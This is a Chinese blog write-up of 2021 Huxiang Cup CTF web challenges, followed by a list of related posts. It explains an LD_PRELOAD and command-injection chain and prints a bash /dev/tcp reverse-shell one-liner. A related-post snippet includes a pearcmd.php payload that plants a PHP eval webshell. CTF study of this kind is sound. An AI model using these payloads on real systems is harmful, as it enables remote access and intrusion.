[CTF复现]湖湘杯2021

最新推荐文章于 2023-12-11 10:28:12 发布
最新推荐文章于 2023-12-11 10:28:12 发布
阅读量3.9k 收藏
点赞数
分类专栏: CTF复现 文章标签: php 安全 go
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/anwen12/article/details/121917832
版权

go_web

今天又是学爆guoke哥哥博客的一天

0x01 MultistageAgency

通过看源码 我们发现 这个题是三个服务

su - web -c "/code/bin/web 2>&1  >/code/logs/web.log &"
su - web -c "/code/bin/proxy 2>&1  >/code/logs/proxy.log &"

/code/bin/server 2>&1  >/code/logs/server.log &

9090 暴露出来的web端口
8080 proxy
9091 内网服务 server 有权限readflag

那开始看源码

先看外网服务 两个路由

/token getToken 
{"success":"f0def9475b624655713b45f66448fe02","failed":""}
/upload 上传文件

image-20211213234527947

没什么屌用。 环境变量

command.Env = append(command.Env, fmt.Sprintf("%s=%s", k, values.Get(k)))

serever 路由

http.HandleFunc("/", getToken)     //设置访问的路由
http.HandleFunc("/manage", manage) //设置访问的路由

command := exec.Command("bash", "-c", cmd)

命令注入 现在要想办法访问他。

到这里 是外部web的访问路劲:

通过环境变量LD_PRELOAD 拦截到我们要的so,然后来弹个shell。然后用安洵的生成一下超级shell绕过,打内网就可以了。(注意编译so的时候 要使用linux环境)

bash -i >& /dev/tcp/192.168.76.1/8080 0>&1

image-20211214001600433

0x02 php

弱密码 admin admin

变量覆盖+include

湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 5040
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
2021湖湘
hezhing
12-08 3201
2021湖湘 只做了一个web,还是问了队友。misc三道题太难了。最后复盘做出来了一个。 web easywii 队友说是p神的知识星球中的内容。后来被人打烂了。 参考链接:Docker PHP裸文件本地包含综述 - 跳跳糖 (tttang.com) payload ?+config-create+/&name=cfile&value=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST['a']);?>+/tm
2020年第六届“湖湘”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛.zip
11-01
2020年第六届“湖湘”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛 真题。包含web,misc,pwn,reverse,crypto等20道题目。仅供学习交流。
湖湘 2021 Crypto (连分数运用)
u010883831的博客
11-24 1660
湖湘 2021 Crypto1.题目2.分析3.实现 连分数 continued_fraction 比赛当时这道题被A爆了,但我就是做不出来。心态炸了。 前几天打西湖,学了点Wiener Attack和连分数,又打开了一直存在桌面的这道题,豁然开朗。 1.题目 from Crypto.Util.number import * import random from math import * from gmpy2 import * ''' m1 = bytes_to_long(flag[:len(flag
2021湖湘 Hideit Writeup
qq_41866334的博客
11-15 3265
2021湖湘 Hideit AAA : immortal 动态调试 直接x64dbg动调找到了关键的加密代码分别是xxtea 和 chacha20,直接动调从中拿出各种参数然后写代码进行解密。其实一开始没看出来chacha20,找到了这篇文章 逆向中常见的Hash算法和对称加密算法的分析 . 解密dll 后来在赛后和队友交流发现这题其实在数据段放了一个加密的dll文件,在解密段可以x64dbg dump出dll的代码。断点下在memncpy上,解密结束后就可以dump出对应的地址,删去pe头之前的
2021湖湘easy&&深育WEBLog
Love&Share
11-14 1390
文章目录湖湘easy深育WEBLog 湖湘easy <?php namespace home\controller; class IndexController{ public function index(){ highlight_file(__FILE__); assign($_GET['name'],$_GET['value']); return view(); } } 题目页面最下边有powered by willphp.
CTF 湖湘 决赛 2021 final.zip
12-07
CTF 湖湘 决赛 2021 final】 CTF(Capture The Flag)是一项网络安全领域的竞技活动,参与者通过解决一系列网络安全问题来获取得分,最终以得分高低决定胜负。湖湘作为一项知名的CTF比赛,旨在促进网络安全...
第七届“湖湘”网络安全技能大赛 初赛 zip
12-07
第七届“湖湘”网络安全技能大赛 初赛
领航 CTF 2021 决赛 真题 7z
12-07
领航 CTF 2021 决赛
[湖湘 2021 final]vote
m0_70819573的博客
04-11 188
【代码】[湖湘 2021 final]vote。
2020年第六届“湖湘”网络安全技能大赛洞庭决赛第一场-理论答题赛
11-11
第六届“湖湘”网络安全技能大赛洞庭决赛第一场-理论答题赛200道原题,答题的时候保存的,跟大家分享一下,希望有需要的小伙伴可以自行学习一下。
2021年--湖湘--final
unexpectedthing的博客
04-28 1473
21年湖湘比赛
2021-湖湘final-Web
feng的博客
01-05 2325
2021-湖湘final-Web 前言 今年湖湘报的社企组的结果就是最后只能摆烂,然后决赛那段时间正好在复习期末,然后考完了想好好的休息一段时间,打游戏打累了再来复现一下湖湘final的题目放松放松。 vote 今年HTB的基本上算是原题了,复现的时候才发现当时做那题的时候就摆烂没管了,所以一点印象没有。。。 const path = require('path'); const express = require('express'); const pug
湖湘-re
qq_37439229的博客
11-02 1216
re1 ibm s/390 看逻辑就是个解方程,z3试一下,原本用bitvec,发现看上去就不怎么对,用int 就好了,真奇怪 from z3 import * table = [0x00, 0x00, 0xB2, 0xB0, 0x00, 0x00, 0x6E, 0x72, 0x00, 0x00, 0x60, 0x61, 0x00, 0x00, 0x56, 0x5D, 0x00, 0x00, 0x94, 0x2D, 0x00, 0x00, 0xAC, 0x79, 0x00, 0x00, 0x39, 0x1
2021-湖湘-Web
feng的博客
11-14 4589
前言 总的来说的话,题目质量还是不错的,另外那道XSS也是0解,也幸好自己是一点XSS都不会(寒假补一波),卷是真的卷,还有很多的东西都只停留在表面吧,除了shiro的鉴权绕过是自己之前专门学过的,所以打开pom.xml看到1.5.0的版本立马就知道这题得有个鉴权绕过,别的,剩下的打shiro一开始没打通才换了工具打(后来才发现我一直在拿cc的链子打,我说怎么打不通。。。)。还是慢慢学习了。 easywill 打开页面发现是个WillPHP,而且应该就是assign的模板渲染了,而且根据这个东西和tp有点关
[湖湘 2021 final]Penetratable
v2ish1yan的博客
09-15 1067
湖湘
[湖湘 2021 final]MultistaeAgency
最新发布
rev1ve的博客
12-11 895
路由的执行bash命令,参数为cmd,不过cmd的值是由参数m拼接后的,所以我们可以自己创建cmd值从环境变量中获取,这样执行的就是我们的恶意命令。代码审计完后整理下,web的main.go的getToken函数环境变量可控的,那么我们可以LD_PRELOAD绕过,RCE的关键地方就是。那么我们可以绕过对m的waf,然后反弹shell到的靶机上用curl命令去弹。我们正常的命令执行是通过参数m来控制,并且监听的是9091端口。上传文件,然后F12在网络处发现token值,得到的方法是。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值